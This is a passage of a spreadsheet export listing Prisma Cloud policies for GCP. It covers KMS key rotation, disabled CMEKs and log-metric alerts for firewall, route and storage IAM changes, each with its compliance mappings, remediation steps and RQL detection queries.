        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2917" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>e4c7d880-c590-481c-86cc-8c55245609b0</t>
        </is>
      </c>
      <c r="AI2917" t="inlineStr">
        <is>
          <t>4b718a26-51ce-47d3-bb0a-1ba56d4a528f</t>
        </is>
      </c>
      <c r="AJ2917" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2917" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2918">
      <c r="A2918" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2918" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2918" s="2" t="inlineStr"/>
      <c r="D2918" t="inlineStr"/>
      <c r="E2918" t="inlineStr"/>
      <c r="F2918" t="inlineStr"/>
      <c r="G2918" t="b">
        <v>1</v>
      </c>
      <c r="H29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18" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2918" t="inlineStr">
        <is>
          <t>gcloud-kms</t>
        </is>
      </c>
      <c r="K2918" t="inlineStr">
        <is>
          <t>GCP Storage bucket CMEK not rotated every 90 days</t>
        </is>
      </c>
      <c r="L2918" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2918" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2918" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2918" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2918" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2918" t="inlineStr">
        <is>
          <t>TA0004</t>
        </is>
      </c>
      <c r="R2918" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0004)</t>
        </is>
      </c>
      <c r="S2918" t="inlineStr"/>
      <c r="T2918" t="b">
        <v>0</v>
      </c>
      <c r="U2918" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2918" t="inlineStr">
        <is>
          <t>gcloud-kms-crypto-keys-list</t>
        </is>
      </c>
      <c r="W2918" t="inlineStr">
        <is>
          <t>This policy identifies GCP Storage bucket with CMEK that are not rotated every 90 days
A CMEK (Customer-Managed Encryption Key), which is configured for a GCP bucket becomes vulnerable over time due to prolonged use. Without regular rotation, the key is at greater risk of being compromised, which could lead to unauthorized access to the encrypted data in the bucket. This can undermine the security of your data and increase the chances of a breach if the key is exposed or exploited.
It is recommended to configure rotation less than 90 days for CMEKs used for GCP buckets.</t>
        </is>
      </c>
      <c r="X2918" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate Cloud Storage Buckets page
3. Click on the reported bucket
4. Go to 'Configuration' tab
5. Under 'Default encryption key', click on the key name
6. Click on 'EDIT ROTATION PERIOD'
7. Select 90 days or less for 'Rotation period' dropdown
8. Click 'SAVE'</t>
        </is>
      </c>
      <c r="Y2918" t="inlineStr"/>
      <c r="Z2918" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-kms-crypto-keys-list' AND json.rule = primary.state equals "ENABLED" and (rotationPeriod does not exist or rotationPeriod greater than 7776000) as X; config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as Y; filter ' $.X.name equals $.Y.encryption.defaultKmsKeyName'; show Y;</t>
        </is>
      </c>
      <c r="AA2918" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2918" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2918" t="inlineStr">
        <is>
          <t>PC-GCP-KMS-1272</t>
        </is>
      </c>
      <c r="AD2918" t="b">
        <v>1</v>
      </c>
      <c r="AE2918" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2918" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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18" t="inlineStr">
        <is>
          <t>a2a94798-c7ff-49bd-ab8f-94b6dc1feaa4</t>
        </is>
      </c>
      <c r="AI2918" t="inlineStr">
        <is>
          <t>cc9b01d0-8fdc-4a51-91a7-f6d885d8e522</t>
        </is>
      </c>
      <c r="AJ2918" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2918" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2919">
      <c r="A2919" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (GCP) Level 1, NIST SP 800-172, PCI DSS v3.2.1, NIST SP 800-171 Revision 2, HITRUST v.9.4.2 [Deprecated], CIS v3.0.0 (GCP) Level 1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, TX-RAMP Level 2, CIS v1.3.0 (GCP), CIS Controls v8.1, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, ISO/IEC 27017:2015, GDPR, DORA, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST CSF, CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, HITRUST CSF v.11.2.0, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ITSG-33, ISO/IEC 27002:2013, Copy of CIS Controls v8, Risk Management in Technology (RMiT), CSA CCM v4.0.12, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2919" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2919" s="2" t="inlineStr"/>
      <c r="D2919" t="inlineStr"/>
      <c r="E2919" t="inlineStr"/>
      <c r="F2919" t="inlineStr"/>
      <c r="G2919" t="b">
        <v>1</v>
      </c>
      <c r="H29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19" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2919" t="inlineStr">
        <is>
          <t>gcloud-kms</t>
        </is>
      </c>
      <c r="K2919" t="inlineStr">
        <is>
          <t>GCP KMS Symmetric key not rotating in every 90 days</t>
        </is>
      </c>
      <c r="L2919" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2919" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2919" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2919" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2919" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2919" t="inlineStr">
        <is>
          <t>CIS Control 5</t>
        </is>
      </c>
      <c r="R2919" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S2919" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2919" t="b">
        <v>0</v>
      </c>
      <c r="U2919" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2919" t="inlineStr">
        <is>
          <t>gcloud-kms-crypto-keys-list</t>
        </is>
      </c>
      <c r="W2919" t="inlineStr">
        <is>
          <t>This policy identifies GCP KMS Symmetric keys that are not rotating every 90 days. A key is used to protect some corpus of data. A collection of files could be encrypted with the same key and people with decrypt permissions on that key would be able to decrypt those files. It's recommended to make sure the 'rotation period' is set to a specific time to ensure data cannot be accessed through the old key.</t>
        </is>
      </c>
      <c r="X2919" t="inlineStr">
        <is>
          <t>To configure automatic rotation for GCP KMS Symmetric keys, please refer to the URL given below and configure "Rotation period" to less than or equal to 90 days:
https://cloud.google.com/kms/docs/rotating-keys#automatic 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4</t>
        </is>
      </c>
      <c r="Y2919" t="inlineStr"/>
      <c r="Z2919" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-kms-crypto-keys-list' AND json.rule = purpose equal ignore case "ENCRYPT_DECRYPT" and primary.state equals "ENABLED" and (rotationPeriod does not exist or rotationPeriod greater than 7776000)
{"category":"General","resourceTypes":["google_kms_crypto_key"]}</t>
        </is>
      </c>
      <c r="AA2919" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2919" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2919" t="inlineStr">
        <is>
          <t>PC-GCP-KMS-927-CKV_GCP_43</t>
        </is>
      </c>
      <c r="AD2919" t="b">
        <v>1</v>
      </c>
      <c r="AE2919" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2919" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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19" t="inlineStr">
        <is>
          <t>287ab1bc-62f5-4b2c-92a7-43c9ee7c6bb6</t>
        </is>
      </c>
      <c r="AI2919" t="inlineStr">
        <is>
          <t>6e394124-06d4-46fc-991e-4b6102ed74da</t>
        </is>
      </c>
      <c r="AJ2919" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2919" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2920">
      <c r="A2920" t="inlineStr"/>
      <c r="B2920" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2920" s="2" t="inlineStr"/>
      <c r="D2920" t="inlineStr"/>
      <c r="E2920" t="inlineStr"/>
      <c r="F2920" t="inlineStr"/>
      <c r="G2920" t="b">
        <v>1</v>
      </c>
      <c r="H29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20" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2920" t="inlineStr">
        <is>
          <t>gcloud-kms</t>
        </is>
      </c>
      <c r="K2920" t="inlineStr">
        <is>
          <t>GCP Storage bucket using a disabled CMEK</t>
        </is>
      </c>
      <c r="L2920" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2920" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2920" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2920" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2920" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2920" t="inlineStr"/>
      <c r="R2920" t="inlineStr"/>
      <c r="S2920" t="inlineStr"/>
      <c r="T2920" t="b">
        <v>0</v>
      </c>
      <c r="U2920" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2920" t="inlineStr">
        <is>
          <t>gcloud-kms-crypto-keys-list</t>
        </is>
      </c>
      <c r="W2920" t="inlineStr">
        <is>
          <t>This policy identifies GCP Storage buckets that are using a disabled CMEK.
CMEK (Customer-Managed Encryption Keys) for GCP buckets allows you to use your own encryption keys to secure data stored in Google Cloud Storage. If a CMEK defined for a GCP bucket is disabled, the data in that bucket becomes inaccessible, as the encryption keys are no longer available to decrypt the data. This can lead to data loss and operational disruption. If not properly managed, CMEK can also introduce risks such as accidental key deletion or mismanagement, which could compromise data availability and security.
It is recommended to review the state of CMEK and enable it to keep the data in the bucket accessible.</t>
        </is>
      </c>
      <c r="X2920" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate Cloud Storage Buckets page
3. Click on the reported bucket
4. Go to 'Configuration' tab
5. Under 'Default encryption key', click on the key name
6. Select the appropriate key version
7. Click 'ENABLE'and then click 'ENABLE' in the pop up</t>
        </is>
      </c>
      <c r="Y2920" t="inlineStr"/>
      <c r="Z2920" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-kms-crypto-keys-list' AND json.rule = primary.state does not equal "ENABLED" as X; config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as Y; filter ' $.X.name equals $.Y.encryption.defaultKmsKeyName'; show Y;</t>
        </is>
      </c>
      <c r="AA2920" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2920" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2920" t="inlineStr">
        <is>
          <t>PC-GCP-STO-1271</t>
        </is>
      </c>
      <c r="AD2920" t="b">
        <v>1</v>
      </c>
      <c r="AE2920" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2920" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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20" t="inlineStr">
        <is>
          <t>6ae4f34e-480f-4697-b675-2c25bd900a1d</t>
        </is>
      </c>
      <c r="AI2920" t="inlineStr">
        <is>
          <t>be3fac0a-48f6-4f52-86dc-96ef8ac8a730</t>
        </is>
      </c>
      <c r="AJ2920" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2920" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2921">
      <c r="A2921" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Telecommunications Security Act - TSA, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v3.0.0 (GCP) Level 2,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NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, CIS v1.1.0 (GCP), ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, Rehan, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.3.0 (GCP), CDC NIST 800-53 Rev4, CIS v2.0.0 (GCP) Level 2, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CIS v1.2.0 (GCP), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.0.0 (GCP), RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013,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ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2921" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2921" s="2" t="inlineStr"/>
      <c r="D2921" t="inlineStr"/>
      <c r="E2921" t="inlineStr"/>
      <c r="F2921" t="inlineStr"/>
      <c r="G2921" t="b">
        <v>0</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2921" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2921" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for VPC Network Firewall rule changes</t>
        </is>
      </c>
      <c r="L2921" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2921" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2921" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2921" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2921" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2921" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2921" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2921" t="inlineStr"/>
      <c r="T2921" t="b">
        <v>0</v>
      </c>
      <c r="U2921" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2921" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2921" t="inlineStr">
        <is>
          <t>This policy identifies the GCP accounts which do not have a log metric filter and alert for VPC Network Firewall rule changes. Monitoring for Create or Update firewall rule events gives insight network access changes and may reduce the time it takes to detect suspicious activity. It is recommended to create a metric filter and alarm to detect VPC Network Firewall rule changes.</t>
        </is>
      </c>
      <c r="X2921" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gce_firewall_rule" AND jsonPayload.event_subtype="compute.firewalls.patch" OR jsonPayload.event_subtype="compute.firewalls.insert"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1" t="inlineStr"/>
      <c r="Z2921" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '($.Y.conditions[*].metricThresholdFilter contains $.X.name) and ($.X.filter contains "resource.type =" or $.X.filter contains "resource.type=") and ($.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=") and $.X.filter contains "gce_firewall_rule" and ($.X.filter contains "jsonPayload.event_subtype=" or $.X.filter contains "jsonPayload.event_subtype =") and ($.X.filter does not contain "jsonPayload.event_subtype!=" and $.X.filter does not contain "jsonPayload.event_subtype !=") and $.X.filter contains "compute.firewalls.patch" and $.X.filter contains "compute.firewalls.insert"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2921" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2921" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2921" t="inlineStr">
        <is>
          <t>PC-GCP-MON-518</t>
        </is>
      </c>
      <c r="AD2921" t="b">
        <v>1</v>
      </c>
      <c r="AE2921" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2921" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>3884bedc-33b5-4b63-a875-7100ee29c434</t>
        </is>
      </c>
      <c r="AI2921" t="inlineStr">
        <is>
          <t>bf21fac2-d9e7-4ab6-8662-2e330923a6c7</t>
        </is>
      </c>
      <c r="AJ2921" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2921" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2922">
      <c r="A2922" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Telecommunications Security Act - TSA,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NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS v1.1.0 (GCP), CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Rehan, CIS v1.0.0 (GCP),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Telecommunications Security Act - TSA,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ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2922" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2922" s="2" t="inlineStr"/>
      <c r="D2922" t="inlineStr"/>
      <c r="E2922" t="inlineStr"/>
      <c r="F2922" t="inlineStr"/>
      <c r="G2922" t="b">
        <v>0</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2922" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2922" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for VPC network route changes</t>
        </is>
      </c>
      <c r="L2922" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2922" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2922" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2922" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2922" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2922" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2922" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2922" t="inlineStr"/>
      <c r="T2922" t="b">
        <v>0</v>
      </c>
      <c r="U2922" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2922" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2922" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for VPC network route changes. Monitoring network routes deletion and insertion activities will help in identifying VPC traffic flows through an expected path. It is recommended to create a metric filter and alarm to detect activities related to the deletion and insertion of VPC network routes.</t>
        </is>
      </c>
      <c r="X2922" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gce_route" AND jsonPayload.event_subtype="compute.routes.delete" OR jsonPayload.event_subtype="compute.routes.insert"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2" t="inlineStr"/>
      <c r="Z2922" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ($.X.filter contains "resource.type =" or $.X.filter contains "resource.type=") and ($.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=") and $.X.filter contains "gce_route" and ($.X.filter contains "jsonPayload.event_subtype=" or $.X.filter contains "jsonPayload.event_subtype =") and ($.X.filter does not contain "jsonPayload.event_subtype!=" and $.X.filter does not contain "jsonPayload.event_subtype !=") and $.X.filter contains "compute.routes.delete" and $.X.filter contains "compute.routes.insert"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2922" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2922" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2922" t="inlineStr">
        <is>
          <t>PC-GCP-MON-519</t>
        </is>
      </c>
      <c r="AD2922" t="b">
        <v>1</v>
      </c>
      <c r="AE2922" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2922" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>0f164462-e37f-4dcc-84c6-fb0db8660211</t>
        </is>
      </c>
      <c r="AI2922" t="inlineStr">
        <is>
          <t>e37ccbf3-77bc-4dda-8840-15cc56623d4a</t>
        </is>
      </c>
      <c r="AJ2922" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2922" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2923">
      <c r="A2923" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.0.0 (GCP), MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS,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TX-RAMP Level 2, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, CIS v1.1.0 (GCP), CIS v1.2.0 (GCP), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CSA CCM v4.0.12, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5,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ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, CIS v3.0.0 (GCP) Level 2, ISO/IEC 27002:2013,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CIS v1.3.0 (GCP), kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v2.0.0 (GCP) Level 2, PCI DSS v4.0,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Rehan, Copy of ACSC Information Security Manual (ISM)-clone, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2923" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2923" s="2" t="inlineStr"/>
      <c r="D2923" t="inlineStr"/>
      <c r="E2923" t="inlineStr"/>
      <c r="F2923" t="inlineStr"/>
      <c r="G2923" t="b">
        <v>0</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2923" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2923" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for Cloud Storage IAM permission changes</t>
        </is>
      </c>
      <c r="L2923" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2923" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2923" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2923" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2923" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2923" t="inlineStr">
        <is>
